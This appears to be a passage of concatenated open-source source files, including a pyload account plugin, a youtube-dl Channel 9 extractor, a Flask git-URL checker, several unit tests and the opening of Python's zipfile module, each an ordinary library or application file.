'scoping_content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'scoping_object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'send': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'notifications.noticetype': {
'Meta': {'object_name': 'NoticeType'},
'default': ('django.db.models.fields.IntegerField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'display': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'})
},
'notifications.notification': {
'Meta': {'object_name': 'Notification'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 3, 22, 0, 0)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notifications.NoticeType']"}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'notification_recipient'", 'to': "orm['auth.User']"}),
'seen': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'notification_sender'", 'to': "orm['auth.User']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '300', 'null': 'True'})
}
}
complete_apps = ['notifications'] |
TheBraveWarrior/pyload | refs/heads/stable | module/plugins/accounts/UptoboxCom.py | 5 | # -*- coding: utf-8 -*-
import time
import re
import urlparse
from ..internal.misc import json
from ..internal.XFSAccount import XFSAccount
class UptoboxCom(XFSAccount):
__name__ = "UptoboxCom"
__type__ = "account"
__version__ = "0.23"
__status__ = "testing"
__description__ = """Uptobox.com account plugin"""
__license__ = "GPLv3"
__authors__ = [("benbox69", "[email protected]"),
("GammaC0de", "nitzo2001[AT]yahoo[DOT]com")]
PLUGIN_DOMAIN = "uptobox.com"
PLUGIN_URL = "https://uptobox.com/"
PREMIUM_PATTERN = r'Premium member'
VALID_UNTIL_PATTERN = r"class='expiration-date .+?'>(\d{1,2} [\w^_]+ \d{4})"
def signin(self, user, password, data):
html = self.load(self.LOGIN_URL, cookies=self.COOKIES)
if re.search(self.LOGIN_SKIP_PATTERN, html):
self.skip_login()
html = self.load(self.PLUGIN_URL,
get={'op': "login",
'referer': "homepage"},
post={'login': user,
'password': password},
cookies=self.COOKIES)
if re.search(self.LOGIN_SKIP_PATTERN, html) is None:
self.fail_login()
|
christianurich/VIBe2UrbanSim | refs/heads/master | 3rdparty/opus/src/opus_gui/models_manager/controllers/submodel_structure_editor_tree.py | 2 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from PyQt4 import QtGui, QtCore
from lxml import etree
from opus_gui.util.convenience import get_unique_name
from opus_gui.models_manager.models.submodel_structure_item import SubmodelStructureItem
class SubmodelStructureEditorTree(QtGui.QTreeWidget):
'''
Custom Tree Widget that has some convenience methods and supports drag and drop assignments of
equations to nests.
'''
def __init__(self, parent_widget = None):
QtGui.QTreeWidget.__init__(self, parent_widget)
self._root_node = None
self.setAcceptDrops(True)
def set_root_node(self, root_node):
self._root_node = root_node
def create_structure_node(self, structure_type):
''' create and insert a new tag of structure_type (<nest> or <equation>).
Accepted values for structure_type are "nest" and "equation" '''
if structure_type not in ['nest', 'equation']:
raise ValueError("Don't know how to create a structure node for '%s'" %structure_type)
# get a unique name for the structure node
taken_names = [node.get('name') for node in self._root_node.findall(structure_type)]
name = get_unique_name('new %s' % structure_type, taken_names)
# create the node with a <variable_list> child node
attrib = {'name': name, '%s_id' % structure_type: '-2'}
structure_node = etree.SubElement(self._root_node, structure_type, attrib)
item = SubmodelStructureItem(structure_node, editable=True, parent_widget=self)
if structure_type == 'equation':
etree.SubElement(structure_node, 'variable_list', {'type': 'variable_list'})
# and insert the item
self.addTopLevelItem(item)
self.emit(QtCore.SIGNAL('structure_changed'))
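    # Illustrative use (sketch; ``tree`` and ``root`` are placeholder names --
    # ``root`` stands for the lxml element that owns the <nest>/<equation> children):
    #     tree = SubmodelStructureEditorTree()
    #     tree.set_root_node(root)
    #     tree.create_structure_node('nest')
    #     tree.create_structure_node('equation')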
def delete_struct_item(self, item):
''' deletes the given item from the tree and the XML '''
node = item._node
if item.parent():
index = item.parent().indexOfChild(item)
item.parent().takeChild(index)
else:
index = self.indexOfTopLevelItem(item)
self.takeTopLevelItem(index)
node.getparent().remove(node)
self.emit(QtCore.SIGNAL('structure_changed'))
def mousePressEvent(self, event):
QtGui.QTreeWidget.mousePressEvent(self, event)
# start drags when the left mouse button is pressed
if event.buttons() == QtCore.Qt.LeftButton:
mime = QtCore.QMimeData() # the data object to be passed with the event
# monkey patch the mime object to avoid converting the Python object to QBytes...
item = self.itemAt(event.pos())
if item is None:
return
mime.dragged_item = item
drag = QtGui.QDrag(self)
drag.setMimeData(mime)
            # prompt the submodel editor to rebuild the structure when the drop was made
if drag.start(QtCore.Qt.MoveAction) == QtCore.Qt.MoveAction:
# item._node.getparent().remove(item._node)
self.emit(QtCore.SIGNAL('structure_changed'))
def _target_and_source_from_event(self, event):
''' convenience to get the target and source item from an event '''
target_item = self.itemAt(event.pos())
source_item = event.mimeData().dragged_item
return (target_item, source_item)
def dragEnterEvent(self, event):
# event must be accepted by enter and move in order to be dropped
event.accept()
def dragMoveEvent(self, event):
target_item, source_item = self._target_and_source_from_event(event)
# if source_item is None we are not dragging anything droppable -- so reject it
# if target_item is None, we are dropping something in the "white area" of the widget
# and if target_item is not None we are dropping on another item
if source_item is None:
event.ignore()
elif target_item is None or target_item._node.tag == 'nest':
event.accept()
else:
event.ignore()
def dropEvent(self, event):
target_item, source_item = self._target_and_source_from_event(event)
if target_item is source_item:
event.ignore()
return
# if the item is dropped in the "white area" of the widget the target_item will be None
if target_item is None:
target_node = self._root_node
else:
target_node = target_item._node
target_node.append(source_item._node)
event.setDropAction(QtCore.Qt.MoveAction)
event.accept()
|
deathmetalland/IkaLog | refs/heads/youtube_sample | ikalog/outputs/mikumikumouth.py | 3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 ExceptionError
# Copyright (C) 2015 Takeshi HASEGAWA
# Copyright (C) 2015 AIZAWA Hina
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import random
import select
import socket
import sys
import traceback
import threading
from ikalog.constants import *
from ikalog.utils import *
from .commentator import Commentator
class MikuMikuMouthServer(object):
    ''' Server that sends commands to MikuMikuMouth
http://mikumikumouth.net/
'''
def __init__(self, host='127.0.0.1', port=50082):
self.host = host
self.port = port
self._socks = set([])
def listen(self):
self._listen_thread = threading.Thread(target=self._listen)
self._listen_thread.start()
def _listen(self):
self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socks.add(self._server)
try:
self._server.bind((self.host, self.port))
self._server.listen(5)
self._loop = True
while self._loop:
rready, wready, xready = select.select(self._socks, [], [], 1)
for sock in rready:
if sock is self._server:
conn, address = self._server.accept()
self._socks.add(conn)
finally:
for sock in self._socks:
sock.close()
self._socks.clear()
def close(self):
self._loop = False
def _send(self, text):
for sock in self._socks:
if sock is not self._server:
try:
sock.sendall(text.encode('utf-8'))
except ConnectionAbortedError:
pass
def talk(self, data):
print(json.dumps(data))
self._send(json.dumps(data))
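# Illustrative standalone use of the server above (sketch; the message keys are
# an assumption about what a MikuMikuMouth client accepts, not confirmed here):
#     server = MikuMikuMouthServer()  # defaults to 127.0.0.1:50082
#     server.listen()
#     server.talk({'text': 'hello', 'tag': 'white'})
#     server.close()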
class MikuMikuMouth(Commentator):
'''
    MikuMikuMouth server
'''
def __init__(self,
host='127.0.0.1',
port=50082,
dictionary={},
dictionary_csv=None,
custom_read_csv=None):
super(MikuMikuMouth, self).__init__(dictionary, dictionary_csv, custom_read_csv)
self._server = MikuMikuMouthServer(host, port)
self._server.listen()
        self._read_event('initialize')
def config_key(self):
return 'mikumikumouth'
def set_config(self, config):
dictionary = config.get(self.config_key(), {})
self._dict = BoyomiDictionary(dictionary)
def get_config(self, config):
mikumikumouth = self._dict.get_config()
config[self.config_key()] = mikumikumouth
return config
def _do_read(self, message):
if (self._server is None) or (not self._enabled):
return
message["tag"] = "white"
self._server.talk(message)
def on_stop(self, context):
self._server.close()
|
renzon/livrogae | refs/heads/master | backend/test/curso_tests/negocio.py | 1 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from curso.model import Curso
from curso.negocio import PesquisarCursoCmd
from util import GAETestCase
class PesquisarCursoTest(GAETestCase):
def test_execute(self):
curso=Curso(nome='PyPrático')
curso.put()
curso_id_str=str(curso.key.id())
comando=PesquisarCursoCmd(curso_id_str)
comando.execute()
curso_encontrado=comando.result
self.assertEqual(curso.key, curso_encontrado.key)
|
Just-D/chromium-1 | refs/heads/master | tools/telemetry/third_party/gsutilz/third_party/boto/boto/ec2/autoscale/request.py | 152 | # Copyright (c) 2009 Reza Lotun http://reza.lotun.name/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Request(object):
def __init__(self, connection=None):
self.connection = connection
self.request_id = ''
def __repr__(self):
return 'Request:%s' % self.request_id
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'RequestId':
self.request_id = value
else:
setattr(self, name, value)
|
noba3/KoTos | refs/heads/master | addons/script.module.youtube.dl/lib/youtube_dl/extractor/channel9.py | 27 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
parse_filesize,
qualities,
)
class Channel9IE(InfoExtractor):
'''
Common extractor for channel9.msdn.com.
    The type of the provided URL (video or playlist) is determined from the
    Search.PageType meta tag in the page HTML rather than from the URL itself,
    since the type cannot always be inferred from the URL alone.
'''
IE_DESC = 'Channel 9'
IE_NAME = 'channel9'
_VALID_URL = r'https?://(?:www\.)?channel9\.msdn\.com/(?P<contentpath>.+)/?'
_TESTS = [
{
'url': 'http://channel9.msdn.com/Events/TechEd/Australia/2013/KOS002',
'md5': 'bbd75296ba47916b754e73c3a4bbdf10',
'info_dict': {
'id': 'Events/TechEd/Australia/2013/KOS002',
'ext': 'mp4',
'title': 'Developer Kick-Off Session: Stuff We Love',
'description': 'md5:c08d72240b7c87fcecafe2692f80e35f',
'duration': 4576,
'thumbnail': 're:http://.*\.jpg',
'session_code': 'KOS002',
'session_day': 'Day 1',
'session_room': 'Arena 1A',
'session_speakers': ['Ed Blankenship', 'Andrew Coates', 'Brady Gaster', 'Patrick Klug', 'Mads Kristensen'],
},
},
{
'url': 'http://channel9.msdn.com/posts/Self-service-BI-with-Power-BI-nuclear-testing',
'md5': 'b43ee4529d111bc37ba7ee4f34813e68',
'info_dict': {
'id': 'posts/Self-service-BI-with-Power-BI-nuclear-testing',
'ext': 'mp4',
'title': 'Self-service BI with Power BI - nuclear testing',
'description': 'md5:d1e6ecaafa7fb52a2cacdf9599829f5b',
'duration': 1540,
'thumbnail': 're:http://.*\.jpg',
'authors': ['Mike Wilmot'],
},
},
{
# low quality mp4 is best
'url': 'https://channel9.msdn.com/Events/CPP/CppCon-2015/Ranges-for-the-Standard-Library',
'info_dict': {
'id': 'Events/CPP/CppCon-2015/Ranges-for-the-Standard-Library',
'ext': 'mp4',
'title': 'Ranges for the Standard Library',
'description': 'md5:2e6b4917677af3728c5f6d63784c4c5d',
'duration': 5646,
'thumbnail': 're:http://.*\.jpg',
},
'params': {
'skip_download': True,
},
}
]
_RSS_URL = 'http://channel9.msdn.com/%s/RSS'
def _formats_from_html(self, html):
FORMAT_REGEX = r'''
(?x)
<a\s+href="(?P<url>[^"]+)">(?P<quality>[^<]+)</a>\s*
<span\s+class="usage">\((?P<note>[^\)]+)\)</span>\s*
(?:<div\s+class="popup\s+rounded">\s*
<h3>File\s+size</h3>\s*(?P<filesize>.*?)\s*
</div>)? # File size part may be missing
'''
quality = qualities((
'MP3', 'MP4',
'Low Quality WMV', 'Low Quality MP4',
'Mid Quality WMV', 'Mid Quality MP4',
'High Quality WMV', 'High Quality MP4'))
formats = [{
'url': x.group('url'),
'format_id': x.group('quality'),
'format_note': x.group('note'),
'format': '%s (%s)' % (x.group('quality'), x.group('note')),
'filesize_approx': parse_filesize(x.group('filesize')),
'quality': quality(x.group('quality')),
'vcodec': 'none' if x.group('note') == 'Audio only' else None,
} for x in list(re.finditer(FORMAT_REGEX, html))]
self._sort_formats(formats)
return formats
def _extract_title(self, html):
title = self._html_search_meta('title', html, 'title')
if title is None:
title = self._og_search_title(html)
TITLE_SUFFIX = ' (Channel 9)'
if title is not None and title.endswith(TITLE_SUFFIX):
title = title[:-len(TITLE_SUFFIX)]
return title
def _extract_description(self, html):
DESCRIPTION_REGEX = r'''(?sx)
<div\s+class="entry-content">\s*
<div\s+id="entry-body">\s*
(?P<description>.+?)\s*
</div>\s*
</div>
'''
m = re.search(DESCRIPTION_REGEX, html)
if m is not None:
return m.group('description')
return self._html_search_meta('description', html, 'description')
def _extract_duration(self, html):
m = re.search(r'"length": *"(?P<hours>\d{2}):(?P<minutes>\d{2}):(?P<seconds>\d{2})"', html)
return ((int(m.group('hours')) * 60 * 60) + (int(m.group('minutes')) * 60) + int(m.group('seconds'))) if m else None
def _extract_slides(self, html):
m = re.search(r'<a href="(?P<slidesurl>[^"]+)" class="slides">Slides</a>', html)
return m.group('slidesurl') if m is not None else None
def _extract_zip(self, html):
m = re.search(r'<a href="(?P<zipurl>[^"]+)" class="zip">Zip</a>', html)
return m.group('zipurl') if m is not None else None
def _extract_avg_rating(self, html):
m = re.search(r'<p class="avg-rating">Avg Rating: <span>(?P<avgrating>[^<]+)</span></p>', html)
return float(m.group('avgrating')) if m is not None else 0
def _extract_rating_count(self, html):
m = re.search(r'<div class="rating-count">\((?P<ratingcount>[^<]+)\)</div>', html)
return int(self._fix_count(m.group('ratingcount'))) if m is not None else 0
def _extract_view_count(self, html):
m = re.search(r'<li class="views">\s*<span class="count">(?P<viewcount>[^<]+)</span> Views\s*</li>', html)
return int(self._fix_count(m.group('viewcount'))) if m is not None else 0
def _extract_comment_count(self, html):
m = re.search(r'<li class="comments">\s*<a href="#comments">\s*<span class="count">(?P<commentcount>[^<]+)</span> Comments\s*</a>\s*</li>', html)
return int(self._fix_count(m.group('commentcount'))) if m is not None else 0
def _fix_count(self, count):
return int(str(count).replace(',', '')) if count is not None else None
def _extract_authors(self, html):
m = re.search(r'(?s)<li class="author">(.*?)</li>', html)
if m is None:
return None
return re.findall(r'<a href="/Niners/[^"]+">([^<]+)</a>', m.group(1))
def _extract_session_code(self, html):
m = re.search(r'<li class="code">\s*(?P<code>.+?)\s*</li>', html)
return m.group('code') if m is not None else None
def _extract_session_day(self, html):
m = re.search(r'<li class="day">\s*<a href="/Events/[^"]+">(?P<day>[^<]+)</a>\s*</li>', html)
return m.group('day').strip() if m is not None else None
def _extract_session_room(self, html):
m = re.search(r'<li class="room">\s*(?P<room>.+?)\s*</li>', html)
return m.group('room') if m is not None else None
def _extract_session_speakers(self, html):
return re.findall(r'<a href="/Events/Speakers/[^"]+">([^<]+)</a>', html)
def _extract_content(self, html, content_path):
# Look for downloadable content
formats = self._formats_from_html(html)
slides = self._extract_slides(html)
zip_ = self._extract_zip(html)
# Nothing to download
if len(formats) == 0 and slides is None and zip_ is None:
self._downloader.report_warning('None of recording, slides or zip are available for %s' % content_path)
return
# Extract meta
title = self._extract_title(html)
description = self._extract_description(html)
thumbnail = self._og_search_thumbnail(html)
duration = self._extract_duration(html)
avg_rating = self._extract_avg_rating(html)
rating_count = self._extract_rating_count(html)
view_count = self._extract_view_count(html)
comment_count = self._extract_comment_count(html)
common = {
'_type': 'video',
'id': content_path,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'avg_rating': avg_rating,
'rating_count': rating_count,
'view_count': view_count,
'comment_count': comment_count,
}
result = []
if slides is not None:
d = common.copy()
d.update({'title': title + '-Slides', 'url': slides})
result.append(d)
if zip_ is not None:
d = common.copy()
d.update({'title': title + '-Zip', 'url': zip_})
result.append(d)
if len(formats) > 0:
d = common.copy()
d.update({'title': title, 'formats': formats})
result.append(d)
return result
def _extract_entry_item(self, html, content_path):
contents = self._extract_content(html, content_path)
if contents is None:
return contents
if len(contents) > 1:
raise ExtractorError('Got more than one entry')
result = contents[0]
result['authors'] = self._extract_authors(html)
return result
def _extract_session(self, html, content_path):
contents = self._extract_content(html, content_path)
if contents is None:
return contents
session_meta = {
'session_code': self._extract_session_code(html),
'session_day': self._extract_session_day(html),
'session_room': self._extract_session_room(html),
'session_speakers': self._extract_session_speakers(html),
}
for content in contents:
content.update(session_meta)
return self.playlist_result(contents)
def _extract_list(self, content_path):
rss = self._download_xml(self._RSS_URL % content_path, content_path, 'Downloading RSS')
entries = [self.url_result(session_url.text, 'Channel9')
for session_url in rss.findall('./channel/item/link')]
title_text = rss.find('./channel/title').text
return self.playlist_result(entries, content_path, title_text)
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
content_path = mobj.group('contentpath')
webpage = self._download_webpage(url, content_path, 'Downloading web page')
page_type_m = re.search(r'<meta name="WT.entryid" content="(?P<pagetype>[^:]+)[^"]+"/>', webpage)
if page_type_m is not None:
page_type = page_type_m.group('pagetype')
if page_type == 'Entry': # Any 'item'-like page, may contain downloadable content
return self._extract_entry_item(webpage, content_path)
elif page_type == 'Session': # Event session page, may contain downloadable content
return self._extract_session(webpage, content_path)
elif page_type == 'Event':
return self._extract_list(content_path)
else:
raise ExtractorError('Unexpected WT.entryid %s' % page_type, expected=True)
else: # Assuming list
return self._extract_list(content_path)
|
Timothee/Passerelle | refs/heads/master | passerelle.py | 1 | import os
from urlparse import urlparse
from flask import Flask, request, Response
app = Flask(__name__)
@app.route("/", methods=["POST"])
def git2git():
from_url = request.args.get('from')
to_url = request.args.get('to')
if not from_url and not to_url:
return Response(status="400 Git URLs Not Sent With Request")
if not from_url:
return Response(status="400 Git 'from' URL Not Sent")
if not to_url:
return Response(status="400 Git 'to' URL Not Sent")
if not check_git_url(from_url):
return Response(status="400 Git 'from' URL Not Acceptable")
if not check_git_url(to_url):
return Response(status="400 Git 'to' URL Not Acceptable")
return Response(response="yay", status=200)
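# Illustrative request against the endpoint above (sketch; assumes the app is
# listening on localhost:5000 as in the __main__ block below):
#   curl -X POST 'http://localhost:5000/?from=git://host/a.git&to=git://host/b.git'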
def check_git_url(url):
''' This is a gross sanity check on git URLs
It doesn't cover all cases but it should filter out
obviously wrong URLs
'''
accepted_schemes = ['ssh', 'git', 'http', 'https', 'ftp', 'ftps',
'rsync', 'file']
if not url.endswith(('.git', '.git/')):
return False
elif url.startswith('file:///'):
return True
elif '://' in url:
parsed = urlparse(url)
return parsed.scheme in accepted_schemes and parsed.netloc != ''
else:
return True
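# Illustrative behaviour of check_git_url, derived from the rules above:
#   check_git_url('https://github.com/user/repo.git') -> True
#   check_git_url('file:///srv/git/repo.git') -> True
#   check_git_url('https://github.com/user/repo') -> False (missing .git suffix)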
if __name__ == "__main__":
port = int(os.environ.get('PORT', 5000))
if port == 5000:
app.debug = True
app.run(host='0.0.0.0', port=port)
|
rudatalab/python-objectcube | refs/heads/master | api/test/test_object_resource/test_object_resource_by_id.py | 1 | import json
from api import app
from api.test import APITest
class TestAPIObjectResourceByID(APITest):
def __init__(self, *args, **kwargs):
super(TestAPIObjectResourceByID, self).__init__(*args, **kwargs)
self.base_url = '/api/objects'
self.app = app.test_client()
def _create_test_object(self):
data = {
'name': u'obj_name',
'digest': u'testdig'
}
res = self.post(self.base_url, data=data)
self.assertEqual(res.status_code, 201)
def test_get_object_by_id_with_invalid_id_returns_404(self):
res = self.get(self.base_url + '/1')
self.assertEqual(res.status_code, 404)
def test_get_object_by_id_returns_object_and_meta(self):
self._create_test_object()
fetch = self.get(self.base_url + '/1')
final = json.loads(fetch.data)
self.assertTrue(final.get(u'meta', False))
self.assertTrue(final.get(u'object', False))
def test_get_description_query_parameter_returns_description(self):
res = self.get(self.base_url + '/1?description')
data = json.loads(res.data)
self.assertTrue(data.get('endpoint') == 'api/objects/<int:id>')
def test_update_object_name_returns_updated_information(self):
self._create_test_object()
updated_data = {
'name': u'dummy'
}
edit = self.put(self.base_url + '/1', data=updated_data)
final = json.loads(edit.data)
self.assertEqual(edit.status_code, 200)
self.assertEqual(final.get('name'), u'dummy')
def test_put_with_no_data_returns_400(self):
res = self.put(self.base_url + '/1', data=None)
self.assertTrue(res.status_code == 400)
def test_update_object_by_id_without_required_params_returns_400(self):
self._create_test_object()
updated_data = {
'test': 'fail'
}
edit = self.put(self.base_url + '/1', data=updated_data)
self.assertEqual(edit.status_code, 400)
def test_updating_object_by_id_that_doesnt_exist_returns_404(self):
self._create_test_object()
updated_data = {
'name': u'dummy'
}
edit = self.put(self.base_url + '/500', data=updated_data)
self.assertEqual(edit.status_code, 404)
def test_delete_object_deletes_object_and_returns_204(self):
self._create_test_object()
res = self.delete(self.base_url + '/1')
self.assertTrue(res.status_code == 204)
res = self.get(self.base_url + '/1')
self.assertTrue(res.status_code == 404)
def test_delete_invalid_object_returns_404(self):
res = self.delete(self.base_url + '/1')
self.assertTrue(res.status_code == 404)
|
2014c2g4/2015cda0623 | refs/heads/master | static/Brython3.1.3-20150514-095342/Lib/zipfile.py | 620 | """
Read and write ZIP files.
XXX references to utf-8 need further investigation.
"""
import io
import os
import re
import imp
import sys
import time
import stat
import shutil
import struct
import binascii
try:
import zlib # We may need its compression method
crc32 = zlib.crc32
except ImportError:
zlib = None
crc32 = binascii.crc32
try:
import bz2 # We may need its compression method
except ImportError:
bz2 = None
try:
import lzma # We may need its compression method
except ImportError:
lzma = None
__all__ = ["BadZipFile", "BadZipfile", "error",
"ZIP_STORED", "ZIP_DEFLATED", "ZIP_BZIP2", "ZIP_LZMA",
"is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile"]
class BadZipFile(Exception):
pass
class LargeZipFile(Exception):
"""
Raised when writing a zipfile, the zipfile requires ZIP64 extensions
and those extensions are disabled.
"""
error = BadZipfile = BadZipFile # Pre-3.2 compatibility names
ZIP64_LIMIT = (1 << 31) - 1
ZIP_FILECOUNT_LIMIT = 1 << 16
ZIP_MAX_COMMENT = (1 << 16) - 1
# constants for Zip file compression methods
ZIP_STORED = 0
ZIP_DEFLATED = 8
ZIP_BZIP2 = 12
ZIP_LZMA = 14
# Other ZIP compression methods not supported
DEFAULT_VERSION = 20
ZIP64_VERSION = 45
BZIP2_VERSION = 46
LZMA_VERSION = 63
# we recognize (but not necessarily support) all features up to that version
MAX_EXTRACT_VERSION = 63
# Below are some formats and associated data for reading/writing headers using
# the struct module. The names and structures of headers/records are those used
# in the PKWARE description of the ZIP file format:
# http://www.pkware.com/documents/casestudies/APPNOTE.TXT
# (URL valid as of January 2008)
# The "end of central directory" structure, magic number, size, and indices
# (section V.I in the format document)
structEndArchive = b"<4s4H2LH"
stringEndArchive = b"PK\005\006"
sizeEndCentDir = struct.calcsize(structEndArchive)
_ECD_SIGNATURE = 0
_ECD_DISK_NUMBER = 1
_ECD_DISK_START = 2
_ECD_ENTRIES_THIS_DISK = 3
_ECD_ENTRIES_TOTAL = 4
_ECD_SIZE = 5
_ECD_OFFSET = 6
_ECD_COMMENT_SIZE = 7
# These last two indices are not part of the structure as defined in the
# spec, but they are used internally by this module as a convenience
_ECD_COMMENT = 8
_ECD_LOCATION = 9
# The "central directory" structure, magic number, size, and indices
# of entries in the structure (section V.F in the format document)
structCentralDir = "<4s4B4HL2L5H2L"
stringCentralDir = b"PK\001\002"
sizeCentralDir = struct.calcsize(structCentralDir)
# indexes of entries in the central directory structure
_CD_SIGNATURE = 0
_CD_CREATE_VERSION = 1
_CD_CREATE_SYSTEM = 2
_CD_EXTRACT_VERSION = 3
_CD_EXTRACT_SYSTEM = 4
_CD_FLAG_BITS = 5
_CD_COMPRESS_TYPE = 6
_CD_TIME = 7
_CD_DATE = 8
_CD_CRC = 9
_CD_COMPRESSED_SIZE = 10
_CD_UNCOMPRESSED_SIZE = 11
_CD_FILENAME_LENGTH = 12
_CD_EXTRA_FIELD_LENGTH = 13
_CD_COMMENT_LENGTH = 14
_CD_DISK_NUMBER_START = 15
_CD_INTERNAL_FILE_ATTRIBUTES = 16
_CD_EXTERNAL_FILE_ATTRIBUTES = 17
_CD_LOCAL_HEADER_OFFSET = 18
# The "local file header" structure, magic number, size, and indices
# (section V.A in the format document)
structFileHeader = "<4s2B4HL2L2H"
stringFileHeader = b"PK\003\004"
sizeFileHeader = struct.calcsize(structFileHeader)
_FH_SIGNATURE = 0
_FH_EXTRACT_VERSION = 1
_FH_EXTRACT_SYSTEM = 2
_FH_GENERAL_PURPOSE_FLAG_BITS = 3
_FH_COMPRESSION_METHOD = 4
_FH_LAST_MOD_TIME = 5
_FH_LAST_MOD_DATE = 6
_FH_CRC = 7
_FH_COMPRESSED_SIZE = 8
_FH_UNCOMPRESSED_SIZE = 9
_FH_FILENAME_LENGTH = 10
_FH_EXTRA_FIELD_LENGTH = 11
# The "Zip64 end of central directory locator" structure, magic number, and size
structEndArchive64Locator = "<4sLQL"
stringEndArchive64Locator = b"PK\x06\x07"
sizeEndCentDir64Locator = struct.calcsize(structEndArchive64Locator)
# The "Zip64 end of central directory" record, magic number, size, and indices
# (section V.G in the format document)
structEndArchive64 = "<4sQ2H2L4Q"
stringEndArchive64 = b"PK\x06\x06"
sizeEndCentDir64 = struct.calcsize(structEndArchive64)
_CD64_SIGNATURE = 0
_CD64_DIRECTORY_RECSIZE = 1
_CD64_CREATE_VERSION = 2
_CD64_EXTRACT_VERSION = 3
_CD64_DISK_NUMBER = 4
_CD64_DISK_NUMBER_START = 5
_CD64_NUMBER_ENTRIES_THIS_DISK = 6
_CD64_NUMBER_ENTRIES_TOTAL = 7
_CD64_DIRECTORY_SIZE = 8
_CD64_OFFSET_START_CENTDIR = 9
def _check_zipfile(fp):
try:
if _EndRecData(fp):
return True # file has correct magic number
except IOError:
pass
return False
def is_zipfile(filename):
"""Quickly see if a file is a ZIP file by checking the magic number.
The filename argument may be a file or file-like object too.
"""
result = False
try:
if hasattr(filename, "read"):
result = _check_zipfile(fp=filename)
else:
with open(filename, "rb") as fp:
result = _check_zipfile(fp)
except IOError:
pass
return result
def _EndRecData64(fpin, offset, endrec):
"""
Read the ZIP64 end-of-archive records and use that to update endrec
"""
try:
fpin.seek(offset - sizeEndCentDir64Locator, 2)
except IOError:
# If the seek fails, the file is not large enough to contain a ZIP64
# end-of-archive record, so just return the end record we were given.
return endrec
data = fpin.read(sizeEndCentDir64Locator)
if len(data) != sizeEndCentDir64Locator:
return endrec
sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data)
if sig != stringEndArchive64Locator:
return endrec
if diskno != 0 or disks != 1:
raise BadZipFile("zipfiles that span multiple disks are not supported")
# Assume no 'zip64 extensible data'
fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2)
data = fpin.read(sizeEndCentDir64)
if len(data) != sizeEndCentDir64:
return endrec
sig, sz, create_version, read_version, disk_num, disk_dir, \
dircount, dircount2, dirsize, diroffset = \
struct.unpack(structEndArchive64, data)
if sig != stringEndArchive64:
return endrec
# Update the original endrec using data from the ZIP64 record
endrec[_ECD_SIGNATURE] = sig
endrec[_ECD_DISK_NUMBER] = disk_num
endrec[_ECD_DISK_START] = disk_dir
endrec[_ECD_ENTRIES_THIS_DISK] = dircount
endrec[_ECD_ENTRIES_TOTAL] = dircount2
endrec[_ECD_SIZE] = dirsize
endrec[_ECD_OFFSET] = diroffset
return endrec
def _EndRecData(fpin):
"""Return data from the "End of Central Directory" record, or None.
The data is a list of the nine items in the ZIP "End of central dir"
record followed by a tenth item, the file seek offset of this record."""
# Determine file size
fpin.seek(0, 2)
filesize = fpin.tell()
# Check to see if this is ZIP file with no archive comment (the
# "end of central directory" structure should be the last item in the
# file if this is the case).
try:
fpin.seek(-sizeEndCentDir, 2)
except IOError:
return None
data = fpin.read()
if (len(data) == sizeEndCentDir and
data[0:4] == stringEndArchive and
data[-2:] == b"\000\000"):
# the signature is correct and there's no comment, unpack structure
endrec = struct.unpack(structEndArchive, data)
endrec=list(endrec)
# Append a blank comment and record start offset
endrec.append(b"")
endrec.append(filesize - sizeEndCentDir)
